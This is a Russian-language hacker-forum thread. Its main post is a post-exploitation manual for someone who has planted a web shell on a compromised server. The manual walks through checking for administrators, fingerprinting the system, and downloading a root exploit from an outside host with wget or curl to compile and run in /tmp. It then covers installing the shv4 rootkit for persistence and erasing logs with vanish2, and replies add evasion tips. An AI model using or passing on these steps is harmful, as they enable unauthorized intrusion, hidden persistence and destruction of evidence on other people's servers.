![]() |
Cистема под ударом.
Меня часто спрашивают, что делать, после того как шелл был залит и получен доступ к файловой системе удаленной системы.
Поэтому я решил написать небольшой мануал о том, что же все-таки делать после того как ты залил шелл и оказался по ту сторону сайта, то есть на сервере. Ну приступим. Допустим мы с вами воспользовались найденной уязвимостью и нам удалось оказаться по ту сторону сайта, на сервере. 1. Есть ли кто? Для начала надо посмотреть есть ли кто нить в системе кроме нас, есть ли админы, как давно заходил админ. Все это можно проделать командой Код:
who или last -n 10Код:
[xzone@hahost ~]$ whoКод:
[xzone@hahost ~]$ last -n 10сервака, чтобы не пропалиться. 2. Куда мы попали? Настало время осмотреться, куда же мы все-таки попали. Для этого достаточно выполнить команду uname -a. Вывод, которой нам повествует о том, какая же это система. Код:
Linux 2.6.8-022stab077-smp-hb #4 SMP Fri Jun 23 22:59:49 MSD 2006 x86_64 x86_64 x86_64 GNU/Linux3. Собираем инфу о системе. Наверное, самый важный момент это собрать как можно больше информации об удаленной системе. Ну, версию оси мы уже выяснили командой uname -a. Теперь выясним, какие же качалки присутствуют на сервере, а также есть ли компилятор gcc. Это понадобиться нам для того, чтобы в дальнейшем мы смогли залить сплойт, если собираемся поэксплуатировать систему. Выполним следующие команды и узнаем, какие качалки есть. Код:
[xzone@hahost ~]$ which lynx;which links;which get;which wget;which fetch;which curlКод:
[xzone@hahost ~]$ which gcc4. Подбираем сплойт. Ну, подбор сплойта это даже тема отдельной статьи, так как сплойтов великое множество. Да и система, приведенная нами в пример не очень удачна, так как на ней многие сплойты просто не компиляться (x86_64 x86_64 x86_64 GNU/Linux). Архитектура понимаешь! Так что допустим мы нашли сплойт под эту версию и теперь мы его хотим заюзать. 5. Юзаем сплойт. Как уже было сказано сплойт мы нашли, осталось дело за малым залить его и запустить ). Для этого перейдем в папку /tmp. Папка /tmp всегда открыта для записи, что собственно нам и нужно. командой Код:
cd /tmpКод:
wget http://site.ru/sploit.cКод:
curl http://site.ru/sploit.c > sploit.cКод:
ls -al sploit.cтак (Для разных сплойтов может быть по разному, привожу пример простейшего случая!!!) Код:
gcc sploit.c -o sploitразличными параметрами. Нам нужен параметр +x, который дает права на запуск. Код:
chmod +x sploitКод:
./sploitесли мы увидим что-то врожде этого uid=0(root) gid=0(root) то самое время кричать УРААА!!! Это значит, что мы рут! А если права остануться что и прежде значит облом. 6. Закрепляемся в ситеме Закрепление в системе происходит по средством руткита. Для этого скачиваем руткит-возьмём shv4. Код:
wget http://splo1t.narod.ru/rootkits/shv4.tar.gzЗаходит в putty указываем сайт, порт и конектимся. Имя root,а пароль тот что вы указали при настройке. В моём случае это root. После того как мы зашли, проверим, светиться ли нащ порт. Выполним команду Код:
nestat -anОсталось, почистить логи. 7. Чистим логи. Но после всех наших преключений остануться логи. Все наши действия будут записаны, для хакера это смерть! Поэтому их надо почистить. Для чистки логов я пользуюсь такой замечательной программой как vanish2. vanish2 - одна из лучших под *nix. скачиваем vanish2 ставим права на запуск Код:
chmod +x vanish2.Код:
gcc vanish2.c –o vanishКод:
./vanish root name_site 127.0.0.1Если мы увидим надпись V_A_N_I_S_H_E_D_! то значит все ok! Мы все почистили. Специально для Xzone.org.ru. Автор: NEO Изначальна статья была размещена на http://xzone.org.ru/showthread.php?t=58 |
Респект, только вместо этого
Цитата:
Код:
[xzone@hahost ~]$ which lynx links get wget fetch curl |
http://forum.antichat.ru/thread17581.html - статья Desr0w
|
Цитата:
Цитата:
|
Согласен с Bl4ck-cat.
Отличаеться только тем, что рассматривается компиляция сплойтов и ... Цитата:
|
Так, небольшие замечания... :D
Цитата:
Цитата:
З.Ы. Перед запуском руткита неплохо бы посмотреть настройки фаера, а то мож порт закрыт на входящие... |
Извините за излишнюю тупорылость, но мне просто интересно кто ни будь вообще набирал в линух консоли команду who. Или все откуда-то это переписывают? Сколько раз не пробовал всегда облом :) , пока случайно не набрал команду w и не получил, то что нужно.
Я, было, думал, что ее называют who, а пишут w. Но у автора явно видно, что он вводит именно who и получает результат. Сейчас попробовал на нескольких веб-шелах и нихера who - нет, w – есть. Толи гоню, толи старею :) |
Цитата:
|
Цитата:
|
| Время: 12:02 |